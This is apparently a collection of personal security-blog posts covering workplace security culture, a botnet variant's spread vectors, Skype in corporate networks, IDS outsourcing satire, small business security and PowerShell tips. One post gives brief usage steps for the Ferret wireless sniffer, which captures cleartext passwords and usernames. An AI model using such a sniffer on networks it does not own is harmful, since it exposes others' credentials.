Not only do I report to a Network Ops manager, this person - who on one hand admits they have no security background - sets the agenda for how I go about addressing this area. There are constant conflicts, up to and including my recommendations and opinions sometimes not being heard because they are perceived as unnecessary, unrealistic, or obstructing progress.

I am the only person dedicated to network security. That is not necessarily a huge issue. The larger issue is that the perception is that I alone should somehow be able to do everything, and I should be able to do everything by myself. The last major virus outbreak we experienced, after a couple of days it became obvious that I could not scan EVERY cpu by myself. However, I was turned down when I asked for help (Our helpdesk was allowed to low-priority my CPU scan tickets.) And in the end, management was thoroughly displeased with how the whole incident was handled (took too long, users were upset, etc). Meanwhile, I was a wreck from having worked about 40 hours in a three-day period. ... An unwinable situation.

The entire IT dept is nearly completely reactionary. We have no CIO, and our IT leader is not seen as an equal by the other top-level executives. Basically, whatever requests or whims other departments want, we wind up trying to accommodate. Even if the wishes are counter-productive, redundant or will adversely affect the network.

IT does not seem to "talk" to the user community. It is almost like the goal is allow the users to do whatever they want, while IT does everything for them. Which would maybe be okay, except there is a culture of allowing the users to do darn near ANYTHING they want. I see a real lack of guidance coming from our IT department.

I am leaving this position. I have been unable to figure out how to simultaneously write policies (there are none), plan strategy, fight the day-to-day fires and perform proactive, pre-emptive research and analysis by myself within a reasonable timeframe to keep up with the ever growing needs of the environment. Things fall through the cracks, mistakes get made. Although some colleagues are beginning to understand that they, too, must become more security conscience in the way they approach networking, still security overall takes a back seat. No one wants to tell the big bosses "no", that some of what they want is not feasible at the moment, or that some things will be delayed because we are trying to do them correctly now. Or tell them the real cost of implementing the latest whiz-bang technology without shoring up the holes that currently exist. -- Definitely, no one wants to say that mistakes were made in the past, and now we have to correct them in order to get better and move on.

Francois [ed: the original poster], I feel for you. I, too, know that not all environments have to be like what you and I have (are) going through. The choice for me is to leave. I hope that you will be able to make your management understand that security is not one person's job. Rather, it is a way of thinking and doing business. To paraphrase the poster, network security is not a destination - it is a journey.

I hope the poster finds a much better position to apply their obvious talents.

So my time with the winter scripting games is pretty much over. I just have to ask why I scored 0 on one event (I think the email submission may have line-wrapped something weird) and give my thanks and positive feedback to the organizers.

Overall, I exceeded my goals. I wanted to give a best effort towards half the Advanced division and get most of the Beginner division correct. I ended up 95/100 in the Beginner division and 90/100 in the Advanced (assuming my one score gets corrected). And I am proud to say that the two I missed were definitely tricky for someone who first installed PowerShell only days before the start of competition.

I have documented my scripting games answers and some links in my wiki (must...use...wiki...more). Thankfully, it just so happens that we're looking to script more at work. Only one guy had previously had any experience scripting, so this makes great sense to include me as a second resource and backup. I plan to continue learning more about PowerShell and try to use it as much as possible. I just purchased Payette's book PowerShell in Action and plan to continue to learn stuff on irc.freenode.net's #powershell channel.

I have this list of things that home users can do to be more secure. One thing I might try to fit in there is to suggest that home users figure out how to install their Operating System.

Now, this may not be about trying to teach someone the nuances of a reinstallation, especially that they should have their data backed up, accounts and software licensing information stored separately, and a list of everything they had installed or need kept available for a reinstall. However, I do believe that one problem people have with working on their computer is a simple lack of exposure to the reinstall process (or someone/someplace that can do it for them). A reinstall is not typically something people do since their computers come from Dell or Gateway which happily does the work pre-ship. But the Internet can become a safer place once people get used to the process of a reinstall or where to turn for help if they decide to do a full reinstall.

I might consider this a half-step since it might be one of the scariest things the average person will do with their computer. Trust me, people are more scared about a reinstall than they typically are about installing all sorts of random programs on their system. Sometimes they are completely worried about losing their years' worth of settings and small tweaks and the position of their desktop icons. However, regularly performing an install or just knowing that it is not all that bad an ordeal will help in being smarter about their computer use. If nothing else, befriend a local support guy, your local Geek Squad, or become familiar with the ability of your provided Tech Support.

I liken this to having a backup solution in place. But how do you know the backup solution is working or how much it is backing up or how to work a restore in the event of an emergency if you've never done a restore from it? An emergency is not the best time to do a restore for the first time.

Whoever occupies the battleground first and awaits the enemy will be at ease; whoever occupies the battleground afterward and must race to the conflict will be fatigued. Thus one who excels at warfare compels men and is not compelled by other men. -The Art of War, Chapter 6: Emptiness and Fullness

I expect Andy to post this up as well, since I think it can definitely be one of those rallying (or frustration) cries we have in security...and we both have the same calendar sitting on our desks!

I wasn't sure about including that last line. The first two lines resonate throughout IT security from testing/planning your disaster recovery plans to being ready to detect and mitigate incidents to simply making sure logs are scanned for the first sign of an enemy. The last line still makes sense as we sometimes do need to dig our heels into the ground and make sure our management knows the score and the risks (properly) so they can be compelled by us to be prepared...otherwise they are compelling us into letting go of the preparedness.

Kurt's comment put that last line into a better light for me and totally makes sense. No wonder if felt a little "off" earlier! Thanks!

I had planned out a couple posts. One was going to explain in no unclear terms that user training is broken and won't help. The follow-up was going to be the opposite in how technology will not ever protect us without end-user training.

I decided to put that on hold and maybe not even post it, but I did want to blab about something else I see in the IT and security communities. I see a lot of very polar opinions on how things should be. You have user training versus technological controls. ROI vs insurance. Business skills vs technical skills. Full-disclosure vs alternatives in either direction. Black hat vs white hat. Perimeter is dead vs perimeter is impoant.

The bottomline? All of these approaches are correct and all should be practiced to some extent. Just like all those diet fads, stick solely to one for a long period of time and you'll have new problems. But if you took the basic concepts from many, you can end up with a very effective approach.

There is a place for each extreme, but they are all necessary and need to be balanced. There are also people who, for instance, can be mired completely in the technical realms and leave the businesspeak to their bosses and not only be successful personally, but help drive their company to success. The balance doesn't have to be in each individual, but a department can achieve balance with imbalanced parts. Then again, even imbalance will work depending on the corporate culture, needs, and outside influences.

CNN was kind enough to post an amazingly oddly placed article about the latest RINBOT/DELBOT/SDBOT variant

This is awesome because now what is otherwise a non-event is becoming something mgmt and normal users are asking me (us) about. Yay! So here's some information to help point you in the right direction in case you get questioned.

As far as I know, only Symantec has this malware variant on their radar. Everyone else seems to be considering this one a minor blip on the radar.

In short, this malware strain is simply an infector for your run-of-the-mill botnet and is not a new threat. Variants of this bot have been around over a year, and this is the 9th (I believe) variant. The vulnerabilities this malware attacks have had available patches for months or longer.

RINBOT - Symantec/Trend name
DELBOT - Sophos name
SDBOT - McAfee name

This new variant spreads in three major fashions:
- Windows Server Service vulnerability (patched in August 2006)
- Symantec AV Client Vulnerability patched late last year
- IPC$ shares with common or no security
- some variants use email attachments

This is not a really new threat. You don't have much to worry about if you do not use Symantec applications and you have patched your servers. Obviously, you also want inbound ports stopped on your perimeter. I won't spam more links. The ones above should be sufficient.

There is question that seems to be boiling around, both now and in the past year or so. Where is security headed? Is security moving to the network/switches? Is security moving to the application and away from the OS? Is it moving to protect data at rest and transit? End-point security? Or just to meet compiance?

These are pretty big questions because it can shape the direction of a company for the next 5 years. I wish I had more answers beyond, "If you take any one approach, you may leave yourself weak in the others. If the whole industry does this, we'll just have a wavering trend where for 10 years the network solidifies and gives way to applications and then 10 years where applications get hardened and network progress breaks down." You can even push that out to technology vs training.

Just some interesting, largely rhetorical questions I keep in mind lately and would love to see discussed at length in the community.

The news of this tool is making the rounds, so I thought I'd post quick. Errata Security has partially released a tool called Ferret which purports to show what all is being leaked through your wireless connection everytime you use it.

How do you run it? Download the file and pull out the pre-compiled ferret.exe. Run it from a command line without options and it will tell you your network interfaces. Pick your interface and run 'ferret.exe -i#' to use that interface. Incidentally, you can use a wired or wireless connection if you'd like. (You might need winpcap, but I don't know since I always have it installed anyway.)

The bottomline is this current tool is not as revolutionary as some news and mailing lists are stating. It is really just a sniffer that is only looking for specific data including broadcasts and some application data; things that anyone running any sniffer would be looking for (such as cleartext IMs, passwords, usernames, sites you visit...). Since this is meant for wireless networks, this stuff is typically "broadcast" anyway, due to the medium.

The real beauty will be in the next part of Ferret that they release, the visual/correlating tool.

Check it out, but if you're used to looking at packet captures, don't expect to be wowed right now.

If leaders can be humane and just, sharing both the gains and the troubles of the people, then the troops will be loyal and naturally identify with the interests of the leadership. -The Art of War, Chapter 1: On Assessment.

There are many ways to look at this quote. In regards to IT security, this immediately made me think about one of the biggest frustrations that senior management can give us: being above the policies. It is highly frustrating when people in leadership positions try to be above the security measures put in place due to their station or ego.

Likewise, as IT professionals we sometimes do have certain liberties and access above and beyond some policies, especially in testing or lab environments or on assessment systems, but by and large we also need to try our darnedest to not be exceptions.

I'm in a bitchy mood today and want to rant on something. This article from ComputerWorld about "How dangerous is Skype" came in at the wrong time.

First, let me just say that I am mixed in my feelings about IM and Skype in a corporate environment. I think this is a trend that, in the long run, will be a losing battle for corporate IT and security. IM is just part of our culture and life, and embracing technology for the betterment of people and the company does have weight. That's not to say I want Skype in corp nets, but I can sit on either side of the fence comfortably. Encrypted network traffic is also part of our future, and we need to start dealing with it now instead of whining about it.

Here is my take on some of the "Skype FUD" or myths that Michael Gough tackles in his article.

Myth No. 1: Skype uses a lot of bandwidth on my network. Great, I'm glad that Michael Gough tells me that a voice call takes 30kbit/sec on my network. That'd be great if I allowed only one call at a time. Scale that out with your users and get back to me.

Myth No. 2: Any computer can be a Supernode. This is one of those beefs with Skype that has been around a long time, and I hated it because it's not an issue in almost every corporate network. Michael is correct, you can't be a supernode if you're behind a NAT. But, that does mean, as Michael mentioned earlier, that your communications will be weirdly routed through someone else. Annoying, but really a non-issue in any NAT situation. (This may become a huge problem in IPv6 or it may become a big problem for Skype itself if less and less supernodes are available as people hide behind NAT or slow connections.) So, I agree with Michael: this is a myth.

Myth No. 3: Skype is susceptible to IM worms and viruses. Myth? What the crap? Is this the Apple defense about "well other IM apps have had lots and Skype none so that means security?" Yes, in part it is although he oddly mixes actual client vulnerabilities with malware sent via other IMs via file transfer. That inflates his "other IMs" numbers and keeps Skype's really low. *sigh*

He also mentions that file transfer can be turned off (which it can be on other IM apps too) and files can be scanned by anti-virus (other IM apps as well). So, I'm not sure what he's trying to say here, but I can illustrate that Skype is no different from other IM apps that have been hit with his 1,000+ issues.

I also challenge that "the main vulnerability of IM applications is their file transfer feature." I conjecture that links to malicious sites sent via IM is more dangerous. This "myth" from Michael is completely wrong, and Skype is absolutely no different from any other IM program.

Myth No. 4: Skype is hard to stop on my network. This really is a half-myth but I slightly dislike how Michael Gough tackles it. From the start, Skype was not hard to defeat: just block it from being able to authenticate and logon the user. Easy. I'm surprised he never mentions this; maybe this has changed. I also dislike that he attempts to defend the network by controlling the OS inventory and OS outbound connections. I don't think this is the best approach, and Skype should be able to be blocked on the network by the network alone. I will admit, however, that stopping a P2P app on a network presents problems, so in a way, Michael's approach is still solid advice. The real issue, though, is Skype should not have to be that hard to block on the layers it uses.

Myth No. 5: Skype is encrypted, so I can't archive IM messages. This is a two-headed dragon and I'm surprised Michael Gough attempted to tackle this in either direction as a myth. Instead, he fumbles the ball:

This one's not really a myth. Skype sessions are encrypted, so yes, you can't capture or archive Skype communications. The same is true of many IM applications, though, so it's not less secure than other IM programs that can use encryption.

Bah! Yes, Skype is encrypted so you can't archive it off the wire, but I'm not sure what settings and apps he uses to say that other IM programs are the same. I can sit down and monitor and grab IMs off the wire on every other popular IM program with default settings. Skype has this feature enabled by default whereas other IMs do not. In fact, I can turn off this setting on every IM program, but with Skype I absolutely cannot. Also, for an article that itself says it is geared to corporate networks as well as individuals, he ignores any issues with HIPAA or compliance that requires logging/archiving/monitoring of data egress via IM. For home users, this is an awesome feature to protect privacy. But this is maybe the biggest hurdle Skype has been facing when it comes to corporate use.

Just to add one more item. Until Skype settings can be controlled centrally, that is another hold in the argument for Skype in the corporate network. Let me centrally control and force settings, file transfer allowances, and yes, adjust encryption such that I can monitor data egress (note that I don't necessarily want it cleartext). There are other considerations, but that's all I'll throw out for now. :)

Just posting a quick pair of links in case anyone is interested in reading about creating an exploit/buffer overflow. Trirat Puttaraksa discusses a Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow. Part 1 is a DoS condition and part 2 goes into actual code excution. Very interesting, although beyond my abilities for now. Browse the rest of his blog for even more dissections.

Dave Aitel posted this to his mailing list today:

Next week is Shmoocon - and I'll be there with whatever the latest build of SILICA is in my pocket. Feel free to pull me aside for a quick demo.

Man, Silica is about as expensive of a high class hooker, and it looks as good too! It's sexy as all hell, and if I ever came up on a few grand to drop on a toy, I'd seriously think about this one (assuming I could get properly vetted). if any of you are at Schmoocon and see him (or maybe his wife too?) around, totally ask to see Silica in action.

It might be the hardest battle you will face as a security professional. It might cause the most grief, frustration, and exasperation. No, it's not trying to make sure all your Windows servers perform smoothly. It's not trying to fend off the dozen vendor calls that come in every day. It's not even an entire weekend wasted because of some unknown glitch caused by someone else that brings down critical systems. And it's not quite the often futile attempts to deter the insider attacks.

Quite possibly the hardest battle we will face is the battle to change the culture of a business from one that trusts everyone, particularly those "in the family," to one that practices diligent security. Ever try to tell your Help Desk personnel that they should not ask for user passwords when doing some work over the user's lunch hour so as not to disrupt their normal work day? Those same desktop people who typically are evaluated based on their customer service to those users? I've been in those shoes and I fully empathize. As a support person, you want to be able to bend over backwards if an important user needs you to; not to give a look of regret and explain that "security process" is tying their hands a bit and inconveniencing everyone.

Have you ever seen the look on senior management's and human resources' faces when you tell them they need to operate in a way where they don't necessarily trust their own people? There's not much more they brush off quite so quickly and easily than claims that their own people may be a threat, even an accidental one.

This battle can be easy in some compan...no. It can be easy in some organizational cultures. The military has ingrained security process very deeply. Larger corps are also a bit more successful in steering culture, especially those that might have real reason to hide things (think Boeing, Lockheed, or Microsoft, e.g.).

But the rest of us...yeah, the rest of us someday have to face those cultural battles where we should not be handing over passwords or being accomodating to persons whose username we may have seen but have never yet met when they ask for something beyond their typically level of access. Is this a new direction for the company that her department is shifting a bit and we have to compensate, or is this an attempt to get access to something she shouldn't have? If we ask the manager to verify and/or authorize, will they just take the path of least resistance and kneejerk a "yeah sure, I approve" response? What kind of look do you get when you explain that perhaps their manager and then the data owner both need to approve access? Is it acceptance or a flash of genuine annoyance that you know will be spread around to anyone willing to hear?

And these are not things that are easily overcome with training and used education. It is one thing to educate a user about something they didn't know previously and are open and receptive to the information. But it is another side of training altogether to tackle culture and paradigm shifts. This typically takes a lot of time and a lot of repeated training towards this aim (or just force it with technology and a big clue banana).

I admit, some places in this country might be easier to adjust attitude than Des Moines, Iowa where I live and work. We're still a very open community and trust and customer service are pretty natural. Even "trust but verify" is a difficult adjustment. When does the line get crossed between being a helpful steward to a company versus practicing a dangerous habit?

Just like a courteous security guard who tends to recognize faces regularly, all it takes is one person out of 10,000 who walk by in a year to bury the company or disclose information that emboldens a competitor, jeopardizes a nation, and affects the livelihoods of your fellow workers. Just one person that is allowed to pass because he looks familiar (he was fired last week against his will), is dressed like a VIP, and looks like he'll pin your manager's ass to the wall if you inconvenience him, can be The One.

While my team has yet to convey a culture shift in the people that matter when it comes to security and customer service, at least we are still trying. We continue to implement technology to not only help cover the company's ass in case our paranoia becomes reality, but we also try to maintain a foundation that if the direction of mgmt changes, we can quickly adjust and add on security as our openings allow.

(This post was partially inspired by Scott Wright's recent post about the insider threat.)

In case you missed this, the REcon 2006 presentation videos are available.

REcon is a Reverse Engineering Conference in Montreal. If you're in that area and consider yourself part of the "in" crowd (or want to be) with reversing, you might want to check this out. Since I'm not exactly a reverser, I can't attest to their quality. Perhaps the presentations might not be worth it, but the socializing and drinks with other geeks might be worth it.

I've watched the presentation by David "h1kari" Hulton on Breaking Wireless... Faster where he talks about FPGA and speeding up the cracking process (dramatically!). Of course, the chips themselves are dramatically costly, hehe. The demos don't go over quite as smoothly as they could, but still a solid personality and presentation on wireless attacking by the author of coWPAtty.

For once I am posting a question since it is something I have yet to be able to answer properly, but the bug keeps itching at me to answer it.

How do you physically locate a wireless user? Pretend you have a wireless network and someone has been getting in. Other than getting lucky and walking around, how do you locate someone efficiently?

Now, I know expensive and expansive solutions exist for larger campus-type wireless implementations to locate users using information on their signal strength and triangulation between overlapping wireless coverage. But what about for your average techie joe who wants to do this? Is there any software and non-expensive hardware that can help?

I also know that I could attempt attacks against a laptop and see if I can turn on an annoying WAV file and increase the sound...but that's a bit too intrusive and variable.

I'll likely troll a few forums and IRC chans looking for this information over the course of the next few months as I'd really like to answer it.

I liked this post by Curphey in relation to the SourceFire IPO. In fact, I like it because of how it portrays IDS/IPS and the typical installation.

[1:20:17 AM] XXXX-XXXX says: I’ve never been at a company where i’ve heard them say they were happy with their sourcefire deployment or for that matter… convinced me they were glad they made the purchase
[1:21:58 AM] XXXX-XXXX says: The security departments gets this new toy, they quickly figure out they dont have the time to babysit it (or configure it properly) then they outsource the monitoring
[1:23:02 AM] XXXX-XXXX says: once the monitoring company gets it.. they detune it as much as possible.
[1:24:44 AM] XXXX-XXXX says: What I see happening is “what do you mean this IPS might stop legit traffic? well lets just run it in IDS mode then”
[1:24:52 AM] XXXX-XXXX says: and after talking to XXXX-XXXX sales engineers
[1:25:02 AM] XXXX-XXXX says: 90% of XXXX-XXXX deployments are in IDS mode only
[1:25:40 AM] XXXX-XXXX says: Less then 5% of XXXX-XXXX deployments take advantage of the SSL decryption and analyze features.

While we have a larger and larger IT force doing things like desktop support and making sure the business world still works in the digital world, there is still a huge shortage of the type of geeks who "get it" and can make a difference with truly technical things. This is why the dashboard IDS/IPS has been superficially successful because it doesn't require deep technical knowledge to get and click through alerts. But the knowledge of what those alerts means is pretty damn spotty and if the IDS/IPS doesn't support tools to drilldown into the mucky darkness of the real technical trenches, that solution is overall just superficial.

But how do you know your out-sourcer is decent with security? Really, we shouldn't move to make security a commodity that is driven by checklists and statistics without understanding. We need more skilled professionals, even if that means they have an inflated salary for a while and later take a small dip.

[10:15:40 AM] XXXX-XXXX says: Hey, I'm so glad you guys took over our security monitoring! We had no clue what was going on with the IDS/IPS after the installation techs left. You guys have helped us pass important compliance initiatives and haven't impacted our business at all!

[10:18:23 AM] SecMonTech04 says: No problem! Looks like we came in just in time too! You had 12,476 alerts in the last month alone, but we've totally taken care of you! Just look how much you needed us!

[10:19:49 AM] XXXX-XXXX says: Sweet mother of all that is good and pure, that's a lot! Whew! By the way, is that the number of alerts after you've tuned the monitoring?

[10:20:45 AM] SecMonTech04 says: Uh, yes.

[10:22:27 AM] XXXX-XXXX says: What did you all tune out?

[10:23:33 AM] SecMonTech04 says: Um, we ignore ARP alerts because it's really just too noisy.

[10:24:12 AM] XXXX-XXXX says: That's it?

[10:24:56 AM] SecMonTech04 says: I believe so...

[10:26:43 AM] XXXX-XXXX says: This is kind of odd. How many of those alerts are important enough to warrant further investigation or worry and wouldn't ever be tuned out by anyone?

[10:29:42 AM] SecMonTech04 says: Looks like about 3...maybe 6 if I am paranoid.

[10:30:31 AM] XXXX-XXXX says: That's it?

[10:31:21 AM] SecMonTech04 says: Oh, and we're not really monitoring much on incoming port 80 because there's too many application level attacks that we don't want to give you a false sense of security about if we said we protected port 80.

[10:32:22 AM] XXXX-XXXX says: Huh? Why the hell not??

[10:34:45 AM] SecMonTech04 says: By the way, did you read the latest alerts from the anti-virus companies? The Internet is falling apart and is being overrun by hooligans and criminals. You better be glad you have us!

[10:37:32 AM] XXXX-XXXX says: Hold on a minute, back up. You're not tuning anything out and not monitoring what might be one of our most important incoming ports. Are you actually blocking any attacks at all?

[10:39:12 AM] SecMonTech04 says: No, we're operating in IDS-only mode. We don't want to risk negatively impacting your business and cause you to distrust and dislike us.

[10:44:41 AM] XXXX-XXXX says: Oh god, I need some Tums...

[10:49:40 AM] XXXX-XXXX says: You realize we will need to start blocking some things?

[10:51:40 AM] SecMonTech04 says: Tell you what, we will turn in blocking (IPS mode) for all incoming ports between 55000 and 58000. Will that be enough?

[10:53:11 AM] XXXX-XXXX says: Whew, I think that will be ok...glad you guys are the experts.

[10:55:54 AM] SecMonTech04 says: Actually, we hire not only the inept techs you let go because you outsourced security, but we also employ interns who just click "ok" to every alert that comes in. They don't really know what this means either.

[10:56:30 AM] XXXX-XXXX says: ...I'll assume you meant to type that in another window.

[10:59:10 AM] SecMonTech04 says: Oops, yes I did, sorry.

I read a few bits in a row today about small business security which made me kinda sit back and decide I disagree. I read a piece from Andy, another from Rothman, and another that Rothman pointed to over at SmallBizResource. I'm sure I'll read some more in the next few days as I attempt to get caught up on my reading in this rather busy week. For now, let me rant a bit and enjoy some foam being flung from my lips.

First, security is easier than a red-headed step-child to get mad at (that's so un-PC, but that's why I'm not a professional blogger...). You can poke holes at it until you turn blue and the sky turns into pudding. That's the nature of the beast we attempt to control and tame every single day, and the grim reality is there will always be holes and improvements and places where we can say, "they don't get it" or "they're not taking care of security." By the way, eventually business is going to tire from this fact that we can always criticize and give security exceptions; eventually this will bite us in the ass as business "settles" for checklist security and nothing more. (But I guess we at least get that far, eh?)

Second, securing a Fortune 50 is a hell of a lot different than securing a 500-person company which is also different from securing a 50-person company. In fact, I really think securing those smaller companies would actually be easier given a knowledgeable geek. Just like in warfare, they are nimble, quick, have a low profile, and tend to be pretty unpredictable and all without the slow-moving girth of a politically-motivated blimp. In other words, I don't think size correlates with security on any other level than coincidental. I don't think there's causation here. (More on this later.)

I still keep my list of the top 5 things I would suggest all small businesses do, not to become compliant with PCI or some other checklist, but to rather make big strides towards security. These 5 things can make a huge move towards being more secure, especially for a small business. They're not really that hard, and I think we overestimate the number of companies who don't do them (and yes, that's coming from me, the skeptic who thinks all companies are basically fucked and full of holes, if not from an outside perspective, then from an insider).

Third, I really don't think the article on SmallBizResource paints with the right colors. The article attempts to paint that SMBs are doing poor security by holding up that many of them are "currently storing sensitive customer data that they are supposed to purge after a transaction is complete under the Payment Card Industry (PCI) Data Security Standard." So? This is a problem with checklist security. So what if they are storing data? How are they storing that data? So what if their front door is unlocked when they have a mantrap, cameras, and internal doors protecting other areas of the company? The act of storing data adds to risk and may be against a compliance regulation, but that is not necessarily insecurity at work. Likewise, not following a security guideline and instead working by common sense can be just fine...unless you want to assume that no one has good common sense. I know I don't follow some blueprint for my own home security and instead follow some common sense, but that itself doesn't mean I'm insecure. And what if they don't store that data but also don't have a properly configured firewall and anti-virus software? Yes, at least they're not going to hemorrhage millions of credentials, but they are certainly not secure.

Fourth, I said I would get back to my comment on how size does not necessarily correlate to security. I truly think security is a function of the quality and intelligence of our security and IT professionals. We need more quality people securing things and running IT and managing the data. Andy brushed up against this in his post. I don't think SMBs don't get it because they're SMBs or have less employees or less resources, per se. I think they don't get it because their IT staffers don't get it and haven't had a chance to get it. There's still an awful, awful number of IT techs who are still learning just how to DO things, let alone do them in a secure fashion.

I've been refraining from posting on this since I didn't think it a big deal, but I've seen far too many other sites posting about the "59 Top Influencers in IT Security."

Absolutely no offense to anyone on that list, but here are a few things wrong:

1) That list is not new, in fact, I found and used that list about 4-6 months ago when looking for more blogs to add to my RSS feeds. It was billed as just someone's list of security blog links. It has only just now been rebranded as a "top of" list. Amazing what a simple title change can do for how distributed it can become. :)

2) Fyodor was mispelled back then as well, and I distinctly recall that.

3) If you read some of the small captions, you'll wonder if the author even reads the blogs/people they are talking about. I expecially liked Bejtlich's and Maynor's entries.

4) Some people are left off that shouldn't have been, and others were included that kinda make you go, "Hmmm." Some of the most important names made the list but only as a "here's the rest" mention.

Anyway, I really didn't want to post that but it's been on the top of my head the last couple days, especially since I keep reading entries about it on my favorite sites. No matter what, that list is still a great resource to plunk all those sites and blogs into your favorite RSS tool and keep up with our industry.

Has anyone else out there noticed sudden activity against MovableType's trackback (mt-tb.cgi) function? Yesterday afternoon and this afternoon my server suddenly stopped responding. Both times this was immediately preceded by a small flood of disparate sources attempting to post trackbacks (which I have disabled). My logs show nothing but onesy-twosy attempts over the past 6 months, months apart.

Michael posted a comment just a bit ago that got me thinking. I'm very open to this sort of stuff right now because it is a position I am in. I am sponging up everything I can learn still on a rather broad scale, and I am also not in a job that I see myself sticking another year in. I guess, like Bridget Jones with relationships, I'm looking for something extraordinary that adds to my life, as opposed to sucks away 8 hours or more a day. There's plenty out there, so it is a waste to stay in something that doesn't fit the bill.

So part of Michael's post was:

I thought I'd be a shoe-in but alas, everyone was looking for the Exchange-SQL-Checkpoint-Oracle-Linux-Unix-and-all-the-Windows-versions guy. Sucks to be me I guess.

That's too true. I really hate those adds and people who are expecting an IT guy to know 15 mainstream things and then an additional 5 rather small tools or technologies. And then to only have 2-4 years of experience and get paid a barely competitive level. What the hell?

It is important to realize one's limitations and skills when looking for an IT job these days. Do I know all 20 tools? Or better yet, do I have the capability to learn the tools I don't know at the moment? Is the company (manager) looking for someone who can grow into those roles, or already knows them at that level?

And that's where I am today. I am keeping myself broad and rather open and knowledgable about a hell of a lot of things in IT and security, but have yet to really dive in and get to be an expert in any one (then again, I am likely harder on myself than others are on me, so others may consider me nearly expert whereas I think I have a ways to go...).

This way, when I find that job that truly adds to my life, I can adapt to it and see what opportunities are presented to me. For instance, if I happen to get a job that opens doors to web app security, I can quite happily dive into it feet first. Likewise with something like PCI/DSS.

By the way, yes, that means I may post my resume somewhere around here in the near future. If you want to see it or offer suggestions or see what I did as inspiration in your own, feel free to email or IM me and I'd be happy to give it out.

George Ou posted what I hope is the last commentary on the Apple wireless debacle from last year, which I still think was the biggest security news of 2006. What I like about Ou's article is how unassuming it is (the digs on Apple aside). I watched the Maynor video last year when it broke and never once thought they were attacking Apple directly. Anyone who watched the video could have seen that.

The problem came from the "blogosphere." Everyone wants to trump others and so when news breaks they attempt to make the most sensational deal about it; a case of news "reporters" trying to make news instead of just reporting it. Pretty quickly, one post claims an attack on Apple, and another one claims lying and scandal, and everyone starts posting willy-nilly third-, fourth-, and fifth-hand information without really knowing jack. Pretty soon, small responses of wrong-doing are muffled out by the masses clamoring and all up in passionate arms about a non-issue.

Ethics in blogging is going to continue to be an interesting topic. In addition, ethics in information usage will be interesting. Throughout history the victors have always written history and made the laws and beliefs. But what about things like Wikipedia? What if they get something wrong? But what if 98% of people believe it to be fact when it really is false? Can that wronged person ever prevail, or does majority (the victor) rule? Interesting questions in our new age...

Holy crap, there's a ton of first year birthdays going on in my rss feeds reader from bloggers. Hell, even RSnake hasn't been around a year! This is just crazy since I could have figured a lot of people had been around longer. It kinda puts some things in perspective, since I've been documenting my day to day "stuff" here or on my personal site since late 2001 when I installed my first news script (no blogs back then!) on my website which, itself, I had maintained since late 1996. It's been a wild ride since then, and obviously I am not one to bang on the door for hits and visitors. :)

Grats to all those people with baby blogs that are starting to grow up and find their identity or realize that they had an identity long ago and can stand just fine as themselves!

It's time again to prune some more links. I've been seriously contemplating moving a lot of my links on the right menu over to a page on my wiki. I've yet to do that so far, and I think I've talked myself into leaving them here. I just wish I had less links since they do get pretty long, however, I use a significant portion of them regularly; sort of my own little personal portal (hence why I would move the portal part to a wiki page). Of course, then my page might look a little bare...I guess I could fill the space with vertical Google ad bars! Hehe, no thanks.

Haxorthematrix seems to have gotten lost in the new year. Info-pull has disappeared as well with few updates. I know just barely over one month of no updates is really being picky, but I'm more picky with more personal blogs and especially those that have not been up more than a year. I'm very aware of the tendency of people to start strong on an endeavor, and then putter out after a few months.

SecurityBullshit is being removed, but only because Mark has merged it with his other blog, SecurityBuddha. I totally dig that name, and I think it interesting the sort of zen way of life that can be found in parts of the computer security industry, from techbuddha to securitybuddha to taosecurity...I wonder if zensecurity is taken? Considering I am highly sympathetic to the Buddhist (and related) way of life and philosophy, I really have this odd little affinity to such sites. Oh, and securityzen.net is not taken! I might have to think about grabbing something like that someday, for possible future branding. Until then, I'm really happy with Terminal23.

The O3 e-zine seems to have disappeared after 3 colorful issues through the first few quarters of last year. I really liked this zine's focus on Open Source, but it really was just the same thing as (in)secure and uninformed (how's that for a combo phrase?!) when you get down to it.

The list of top 10 security live cds from DarkNet is starting to look dated, especially as BackTrack2 is now out and really kinda dominates this field (minus general livecd and forensics offerings). Besides, I have moved this to my own live cd list on my wiki anyway. I don't use VMyths, so why bother with the link, especially as I try to get this list down a bit (of course, for every one I remove, I seem to add another...). Church of the Swimming Elephant is a classic site that still has lots of useful stuff. Sadly, it continues to grow more and more dated. If you've not gone there, go there and browse the info and wares. Definitely harkens back to a more innocent time in hacking!

A reverse engineering site that I never really visited seems to have also disappeared. I also never visit the ProfessionalSecurityTesters site. Besides sounding a little off, the site itself just never sat well with me and I never really went back.

I've been doing some scripting at work and had a desire to test if a server exists before attempting to do some work against it (less errors, cleaner execution...). I hadn't found anything that I wanted to use so I asked in the #powershell channel on irc.freenode.net. MoW, of course, knew the answer since he is the Google of PowerShell. Give him a question and he'll throw out the answer.

shell> $ping = new-Object System.Net.NetworkInformation.Ping
shell> $ping.Send('localhost').status
Success
shell> $ping.Send('blah').status
Exception calling "Send" with "1" argument(s): "An exception occurred during a Ping request."

Update: Gaurhoth gives some information comparing Win32_PingStatus with the above method.

We've yet to see this come to a head, but I bet it will be soon. An article I read today contained a few tidbits about cyber warfare:

History teaches us that a purely defensive posture poses significant risks, Cartwright told the committee. He [Marine Gen. James Cartwright, commander of the Strategic Command] added that if we apply the principle of warfare to the cyberdomain, as we do to sea, air and land, we realize the defense of the nation is better served by capabilities enabling us to take the fight to our adversaries, when necessary, to deter actions detrimental to our interests.

Cartwright said U.S. adversaries in cyberspace include other countries, terrorists and criminals who operate behind what he described as technical, legal and international screens, and he said that if we are to take the fight to our adversaries, we will need Congress help finding solutions to penetrate these screens...

[Lt. Gen. Robert Elder Jr., commander of the 8th Air Force and JFCC-Global Strike and Integration] did not detail plans for going on the offensive. But when asked about it, he said, "We will probably do some of that, by the way."

We might be going on the offensive? Are we actually at war in a way that we can go on the offensive as if we were on the sea, air, or land? I really wonder if that will be seen as a hostile action or not, or if this is all still just contested territory. I don't have much thought on this right now, but as the years move forward, this cyber conflict could pose ramifications on the openness and neutrality of our Internet.

No sooner do I finish up on my Windows server...now I'm using an older 400Mhz box to start standing up an Ubuntu server to start using stuff there. While I like stability for the things I use daily, I really want to learn more, so rather than languish my stuff on Windows for a few years, I'm moving on already.

The first thing I want to move over are the things I use cygwin/Windows for, namely my SSH server. My SSH server gets quite a few hits, strangely Amsterdam is outpacing Asia in SSH auth attempts. If you let that page load, you can see all the attempted login names. Since I am running SSH on cygwin, I don't even use "root" or "admin." I'm surprised that "Administrator" is not used more, since that is what cygwin pulls in (it mirrors the Windows accounts). If someone can do that small battery of attempts, it is trivial to add "administrator" to that initial slam.

